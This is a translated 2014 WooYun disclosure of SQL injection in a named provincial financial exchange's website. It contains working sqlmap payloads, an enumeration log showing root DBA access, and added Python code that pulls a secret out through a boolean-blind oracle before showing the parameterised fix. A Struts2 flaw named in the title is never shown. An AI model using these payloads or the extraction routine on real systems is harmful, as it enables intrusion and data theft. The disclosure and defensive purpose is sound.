
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-068350

Title: Two vulnerabilities in a provincial financial assets exchange (lots of money on the homepage)

Affected vendor: a provincial financial assets exchange

Author: 路人甲

Submitted: 2014-07-13 13:31

Fix deadline: 2014-08-27 13:32

Published: 2014-08-27 13:32

Vulnerability type: command execution

Severity: high

Self-assessed rank: 20

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-07-13: details sent to the vendor, awaiting vendor handling
2014-07-18: vendor confirmed; details visible to the vendor only
2014-07-28: details disclosed to core white hats and relevant domain experts
2014-08-07: details disclosed to regular white hats
2014-08-17: details disclosed to intern white hats
2014-08-27: details disclosed to the public

Summary:

Two vulnerabilities in a provincial financial assets exchange: Struts2 and SQL injection

Details:

Sichuan Financial Assets Exchange
url: http://www.scfae.com/

[screenshot: 222.png]


---
Place: GET
Parameter: class_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class_id=80' AND 6332=6332 AND 'UMJp'='UMJp
Type: UNION query
Title: MySQL UNION query (NULL) - 11 columns
Payload: class_id=80' LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a6b676a3a,0x474f5a426b46456a6745,0x3a716b733a),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: class_id=80' AND SLEEP(5) AND 'fHfq'='fHfq
---
[11:57:58] [INFO] testing MySQL
[11:57:58] [INFO] confirming MySQL
[11:57:58] [WARNING] reflective value(s) found and filtering out
[11:57:58] [INFO] the back-end DBMS is MySQL
[11:57:58] [INFO] fetching banner
[11:57:58] [INFO] actively fingerprinting MySQL
[11:57:58] [INFO] executing MySQL comment injection fingerprint
[11:57:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[11:57:59] [WARNING] unable to perform MySQL comment injection
web application technology: JSP
back-end DBMS: active fingerprint: MySQL >= 5.5.0
banner: '5.5.17'
[11:57:59] [INFO] fetching current user
current user: 'root@localhost'
[11:57:59] [INFO] fetching current database
current database: 'scfae'
[11:57:59] [INFO] testing if current user is DBA
[11:57:59] [INFO] fetching current user
current user is DBA: True
[11:58:00] [INFO] fetching database users
database management system users [19]:
[*] 'root'@'localhost'
[11:58:00] [INFO] fetching database users privileges
database management system users privileges:
[*] 'root'@'localhost' (administrator) [19]:
privilege: ALTER
privilege: CREATE
privilege: CREATE TEMPORARY TABLES
privilege: DELETE
privilege: DROP
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHUTDOWN
privilege: SUPER
privilege: UPDATE
[11:58:00] [WARNING] on MySQL the concept of roles does not exist. sqlmap will enumerate privileges instead
[11:58:00] [INFO] fetching database users privileges
database management system users roles:
[*] 'root'@'localhost' (administrator) [38]:
role: ALTER
role: ALTER
role: CREATE
role: CREATE
role: CREATE TEMPORARY TABLES
role: CREATE TEMPORARY TABLES
role: DELETE
role: DELETE
role: DROP
role: DROP
role: EXECUTE
role: EXECUTE
role: FILE
role: FILE
role: INDEX
role: INDEX
role: INSERT
role: INSERT
role: LOCK TABLES
role: LOCK TABLES
role: PROCESS
role: PROCESS
role: REFERENCES
role: REFERENCES
role: RELOAD
role: RELOAD
role: REPLICATION SLAVE
role: REPLICATION SLAVE
role: SELECT
role: SELECT
role: SHOW DATABASES
role: SHOW DATABASES
role: SHUTDOWN
role: SHUTDOWN
role: SUPER
role: SUPER
role: UPDATE
role: UPDATE
[11:58:01] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] scfae
[*] test
[11:58:01] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, scfae, test'
Database: information_schema
[19 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
+---------------------------------------+
[11:58:01] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[11:58:01] [INFO] fetching current database
[11:58:01] [INFO] fetching columns for table 'CHARACTER_SETS' in database 'scfae'
[11:58:02] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:02] [INFO] retrieved:
[11:58:02] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[11:58:03] [INFO] retrieved:
[11:58:05] [INFO] fetching columns for table 'COLLATIONS' in database 'scfae'
[11:58:05] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:05] [INFO] retrieved:
[11:58:06] [INFO] retrieved:
[11:58:08] [INFO] fetching columns for table 'COLLATION_CHARACTER_SET_APPLICABILITY' in database 'scfae'
[11:58:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:08] [INFO] retrieved:
[11:58:10] [INFO] retrieved:
[11:58:11] [INFO] fetching columns for table 'COLUMNS' in database 'scfae'
[11:58:12] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:12] [INFO] retrieved:
[11:58:13] [INFO] retrieved:
[11:58:15] [INFO] fetching columns for table 'COLUMN_PRIVILEGES' in database 'scfae'
[11:58:15] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[11:58:15] [INFO] retrieved:
[11:58:17] [INFO] retrieved:
[11:58:18] [INFO] fetching columns for table 'ENGINES' in database 'scfae'
[11:58:18] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
A
[12:11:00] [INFO] retrieved:
[12:11:01] [INFO] fetching columns for table 'EVENTS' in database 'scfae'
[12:11:01] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:01] [INFO] retrieved:
[12:11:03] [INFO] retrieved:
[12:11:04] [INFO] fetching columns for table 'FILES' in database 'scfae'
[12:11:05] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:05] [INFO] retrieved:
[12:11:06] [INFO] retrieved:
[12:11:08] [INFO] fetching columns for table 'GLOBAL_STATUS' in database 'scfae'
[12:11:08] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:08] [INFO] retrieved:
[12:11:10] [INFO] retrieved:
[12:11:11] [INFO] fetching columns for table 'GLOBAL_VARIABLES' in database 'scfae'
[12:11:12] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:12] [INFO] retrieved:
[12:11:13] [INFO] retrieved:
[12:11:15] [INFO] fetching columns for table 'KEY_COLUMN_USAGE' in database 'scfae'
[12:11:15] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:15] [INFO] retrieved:
[12:11:16] [INFO] retrieved:
[12:11:18] [INFO] fetching columns for table 'PARAMETERS' in database 'scfae'
[12:11:18] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:18] [INFO] retrieved:
[12:11:20] [INFO] retrieved:
[12:11:21] [INFO] fetching columns for table 'PARTITIONS' in database 'scfae'
[12:11:22] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:22] [INFO] retrieved:
[12:11:23] [INFO] retrieved:
[12:11:25] [INFO] fetching columns for table 'PLUGINS' in database 'scfae'
[12:11:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:25] [INFO] retrieved:
[12:11:27] [INFO] retrieved:
[12:11:28] [INFO] fetching columns for table 'PROCESSLIST' in database 'scfae'
[12:11:29] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:29] [INFO] retrieved:
[12:11:30] [INFO] retrieved:
[12:11:32] [INFO] fetching columns for table 'PROFILING' in database 'scfae'
[12:11:32] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:32] [INFO] retrieved:
[12:11:33] [INFO] retrieved:
[12:11:35] [INFO] fetching columns for table 'REFERENTIAL_CONSTRAINTS' in database 'scfae'
[12:11:36] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:36] [INFO] retrieved:
[12:11:37] [INFO] retrieved:
[12:11:39] [INFO] fetching columns for table 'ROUTINES' in database 'scfae'
[12:11:39] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:39] [INFO] retrieved:
[12:11:41] [INFO] retrieved:
[12:11:42] [INFO] fetching columns for table 'SCHEMATA' in database 'scfae'
[12:11:42] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[12:11:42] [INFO] retrieved:
[12:11:44] [INFO] retrieved:
Database: scfae
Table: ENGINES
[2 columns]
+--------+------+
| Column | Type |
+--------+------+
| `,` | |
| A | |
+--------+------+
[12:11:46] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[12:11:46] [INFO] fetched data logged to text files under 'c:\Python27\sqlmap\output\www.scfae.com'
[*] shutting down at 12:11:46

Proof of vulnerability:

As above

Suggested fix:

so?
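The sqlmap transcript above establishes three things a practitioner should read together: the class_id parameter is injectable in the WHERE clause (boolean-blind, UNION and time-based), the application connects as root@localhost with FILE and SUPER among its privileges, and the report's fix section is empty. The following Python is an added example written for this page, not code from the report or from the exchange's site. It reproduces the string-concatenation bug against a constructed in-memory SQLite database, drives it with the same boolean-blind payload shape sqlmap used (80' AND <condition> AND 'UMJp'='UMJp) to pull a secret back one character at a time, and shows the parameterised query that closes the hole. The news and users tables, their rows and column names are assumptions; SQLite stands in for the MySQL 5.5.17 that sqlmap fingerprinted, so the MySQL-only parts of the transcript (SLEEP(5), the trailing # comment, the 11-column UNION) are not reproduced.

```python
import sqlite3

# Constructed sample database (assumed schema and data, not taken from the report).
# SQLite stands in for the target's MySQL 5.5; the injection mechanics are the same.


def setup_db():
    """Create the in-memory sample database used by every function below."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, class_id TEXT, title TEXT);
        INSERT INTO news(class_id, title) VALUES
            ('80', 'Listing A'), ('80', 'Listing B'), ('81', 'Other');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 's3cret');
    """)
    return conn


def list_news_vulnerable(conn, class_id):
    """The bug pattern sqlmap found: the request parameter is spliced into the
    SQL text, so a quote in class_id ends the literal and the rest is parsed as SQL."""
    sql = "SELECT title FROM news WHERE class_id='" + class_id + "' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_news_fixed(conn, class_id):
    """Parameterised query: class_id is bound as data and can never change the
    statement's structure (PreparedStatement + setString in the JSP world)."""
    sql = "SELECT title FROM news WHERE class_id=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (class_id,))]


def boolean_oracle(conn, condition):
    """Ask one yes/no question using the shape of sqlmap's boolean-based payload,
    class_id=80' AND <condition> AND 'UMJp'='UMJp. The page returns the class 80
    rows when the condition is true and nothing when it is false."""
    payload = "80' AND (" + condition + ") AND 'UMJp'='UMJp"
    return len(list_news_vulnerable(conn, payload)) > 0


def extract_string(conn, subquery, max_len=64):
    """Recover the result of a scalar subquery one character at a time, binary
    searching over printable ASCII (32..126) with nothing but the true/false oracle.
    This is what sqlmap is doing behind every 'retrieved:' line in the transcript."""
    result = ""
    for pos in range(1, max_len + 1):
        # Stop when the string has no character at this position.
        if not boolean_oracle(conn, "length((%s)) >= %d" % (subquery, pos)):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "unicode(substr((%s), %d, 1)) > %d" % (subquery, pos, mid)
            if boolean_oracle(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = setup_db()
    evil = "80' AND 1=1 AND 'UMJp'='UMJp"
    print(list_news_vulnerable(db, evil))                 # rows come back: injectable
    print(list_news_vulnerable(db, evil.replace("1=1", "1=2")))  # empty: the oracle works
    print(extract_string(db, "SELECT password FROM users WHERE username='root'"))
    print(list_news_fixed(db, evil))                      # empty: payload is just a string
```

Each extracted character costs about seven requests here, which is why sqlmap's transcript takes minutes per column even on a responsive target. The fix is the parameterised form, not input filtering: in the JSP application the equivalent is a PreparedStatement with the value bound via setString. The transcript's privilege listing is the other item to act on: the application's account is root with FILE and SUPER, so this injection is not limited to reading the scfae database (FILE alone permits LOAD_FILE() and SELECT ... INTO OUTFILE). A dedicated low-privilege MySQL user for the web application limits what any future injection can reach.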

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: high

Vulnerability rank: 13

Confirmed: 2014-07-18 10:14

Vendor reply:

CNVD has confirmed and reproduced the described issues and has passed them via CNCERT to its Sichuan branch, which will follow up with the site's operating organisation. Scored as multiple vulnerabilities combined: rank 13.

Latest status:

None yet